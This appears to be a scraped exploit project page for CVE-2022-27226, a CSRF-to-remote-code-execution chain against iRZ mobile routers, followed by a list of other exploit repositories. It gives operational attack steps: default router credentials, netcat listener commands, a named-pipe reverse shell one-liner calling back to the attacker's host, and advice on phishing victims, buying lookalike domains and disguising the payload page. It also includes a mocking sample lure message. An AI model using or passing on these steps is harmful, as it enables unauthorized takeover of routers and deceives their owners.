Exploit for CVE-2022-27226

Overview

ez-iRZ

Exploit for CVE-2022-27226

Cross Site Request Forgery to Remote Code Execution in iRZ Mobile Routers

Credits

<--Vulnerability Discovery-->

John Jackson

Chris Mack --- [https://github.com/0xHalcyon]

<--Exploit Development-->

Stephen Chavez --- [https://github.com/redragonx/]

Robert Willis

Description

A CSRF issue on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor's defined interval, leading to remote code execution, allowing the threat actor to gain file system access. In addition, if the router's default credentials aren't rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction.

Pre-execution notes:

Starting two netcat listeners prior to attempting to catch a shell is pertinent, this is because the crontab, when run, will repeat the same cronjob multiple times and your shell will die on the next cycle. You can't utilize nohup because the busybox env is fairly restrictive, and alternatively you could modify the exploit with a different crontab entry interval, however the best way to defeat this without worrying about crontab interval is two utilize multiple listeners for the first reverse shell catch.

It was discovered that in most cases, the routers don't have the telnet port open externally - however, once gaining remote code execution, you can utilize telnet to fix TTY for the most part. You need to have credentials to do so. If you're utilizing the full CSRF to RCE chain, we would recommend that you build a more comprehensive CSRF poc template that records the user's login event or the headers which may contain the basic authorization header that is translated in the script.

Executing Post Authenticated Remote Code Execution Module (With Credentials)

Default credentials for these routers are typically root:root or admin:admin. If you have credentials, run:

python cve.py

Follow the instructions which are quite simple, then start two netcat listeners on two seperate ports.

nc -lvp 443
nc -lvp 5000

When you catch a reverse shell in the first listener, rerun the reverse shell one liner to gain a persistent shell:

rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} {second_nc_listener_port} >/tmp/f

Finally, if you have credentials (which you should if you're using this portion of the module) - attempt to pivot to the internally restricted telnet service:

telnet 0.0.0.0

"But what if telnet is exposed externally?" Then login to the fucking router with the credentials, dumbass.

Executing CSRF to RCE Module (No Credentials)

The instructions for this module are nearly the same as the Post Auth RCE instructions. With the major difference being that you don't have credentials.

First and foremost, to exploit efficiently, you have to understand how this works. CSRF requires user interaction, meaning that you'll need to social engineer someone. There are two potentional scenarios: User is logged in when they click the proof of concept button, or user isn't logged in. If they are already authenticated to the router, the POST request to make the cronjob will be sent to the API and the user will see a blank page. If they aren't logged in, the user will get a basic authentication prompt - and conveniently enough, the basic auth popup will have the IP of the victim router, if they enter their credentials it sends the POST request to the API.

We recommend attempting to buy a similar domain if the victim router is hosted on a subdomain or finding a provider with the same subnet ranges for servers if it's a high-priority target. Refining the CSRF PoC might be work it for a priority target.

Run the script

python cve.py

Follow the instructions, in the script, it will then generate a csrf template for you. We recommend naming it something a little more covert.

mv poc.new.html index.html

Host the PoC on your server, preferably on the same port as the victim router.

python3 -m http.server 80

Take the link and send it to the victim, ensuring that you append the name of the PoC file to the end of the url:

Hi sweetie, can you login to router pwease:
http://your-ip-in-the-united-states-bcuz-you-didnt-take-my-advice/index.html
You might also like...

Apache Spark Command Injection PoC Exploit for CVE-2022-33891

CVE-2022-33891 PoC PoC for CVE-2022-33891, with ability to set custom payloads. Not vulnerable by default; vulnerable when: ./spark-submit --conf spar

Dec 21, 2022

Exploit for PrestaShop bockwishlist module 2.1.0 SQLi (CVE-2022-31101)

Exploit for PrestaShop bockwishlist module 2.1.0 SQLi (CVE-2022-31101)

CVE-2022-31101 Exploit for PrestaShop bockwishlist module 2.1.0 SQLi (CVE-2022-31101) Usage python3 cve-2022-31101.py Give the url to the wishlist whe

Nov 9, 2022

Exploit code for Jira Mobile Rest Plugin SSRF (CVE-2022-26135)

CVE-2022-26135 - Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server About Assetnote Assetnote automatically maps y

Dec 8, 2022

A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin 1.997.

A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin < 1.997.

A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin 1.997. Features Supports HTTP and HTTPS (even with

Dec 22, 2022

Python Script to exploit Zimbra Auth Bypass + RCE (CVE-2022-27925)

Zimbra Unauthenticated Remote Code Execution Exploit (CVE-2022-27925) _____ _ __ /__ / (_)___ ___ / /_ _________ _ /

Nov 9, 2022

Proof of Concept exploit for CVE-2022-36804 affecting BitBucket versions 8.3.1

CVE-2022-36804-PoC Multithreaded exploit script for CVE-2022-36804 affecting (most) BitBucket versions 8.3.1 See the full advisory here https://jira.

Nov 9, 2022

Somewhat Reliable PoC Exploit for CVE-2022-36804 (BitBucket Critical Command Injection)

CVE-2022-36804-PoC-Exploit A somewhat reliable PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection). This attack generally requires p

Oct 25, 2022

A real exploit for BitBucket RCE CVE-2022-36804

CVE-2022-36804 PoC This repo contains a simple proof of concept exploit for the recent BitBucket remote code execution vulnerability (CVE-2022-36804).

Dec 7, 2022

A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager

CVE-2022-40684 POC for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances. Technical Analysis A technical root c

Dec 28, 2022
Owner
Sakura Samurai
Sakura Samurai
ProxyNotShell and CVE-2022-41040 and CVE-2022-41082 #RCE #Exploit

ProxyNotShell ProxyNotShell and CVE-2022-41040 and CVE-2022-41082 Microsoft confirmed the two new zero-day vulnerabilities are being used in attacks a

Zer0 1 Oct 9, 2022
cve-2014-6271 (Shellshock) Bash CGI exploit/Bash binary exploit

cve-2014-6271 (Shellshock) cve-2014-6271.py - Bash CGI Remote Code Execution Successful connection output ┌──(root??ghost)-[/home/ghost] └─# python3 c

null 1 Oct 12, 2022
Apache APISIX Remote Code Execution (CVE-2022-24112) proof of concept exploit

Apache APISIX Remote Code Execution (CVE-2022-24112) Exploit Summary An attacker can abuse the batch-requests plugin to send requests to bypass the IP

Ven3xy 10 Sep 24, 2022
Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit

Spring4Shell PoC Application This is a dockerized application that is vulnerable to the Spring4Shell vulnerability (CVE-2022-22965). Full Java source

Brandon Forbes 272 Dec 5, 2022
WSO2 RCE (CVE-2022-29464) exploit and writeup.

CVE-2022-29464 WSO2 RCE (CVE-2022-29464) exploit and writeup. Details CVE-2022-29464 is critical vulnerability on WSO2 discovered by Orange Tsai. the

hakivvi 335 Dec 26, 2022
😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464.

?? WSOB (CVE-2022-29464) ?? WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464. CVE-2022-29464 details:

0p 26 Jan 9, 2023
Exploit and Check Script for CVE 2022-1388

F5-CVE-2022-1388-Exploit Exploit and Check Script for CVE 2022-1388 Usage Check against single host python3 CVE-2022-1388.py -v true -u target_url At

Andy Gill 52 Dec 22, 2022
Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection

Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection Another exploit in OGNL Land Description Confluence is a web-

whokilleddb 4 Jul 29, 2022
Mass Exploit for CVE 2022-29464 on Carbon

Meow Meow Meow! Just a Mass Exploit based on a Python PoC for # WSO2 Carbon Server CVE-2022-29464 Pre-auth RCE bug CVE-2022-29464. Meow Meow Meow? Req

Your friendly Neighborhood Electr0-Lulz 12 Dec 12, 2022
Mass-Exploit-CVE-2022-1388

Dorks scan will be available soon. Unfortunatelly is required a shodan account with basic feature to obtain more than 20k targets.. Vuln Impact This v

Your friendly Neighborhood Electr0-Lulz 3 Jul 12, 2022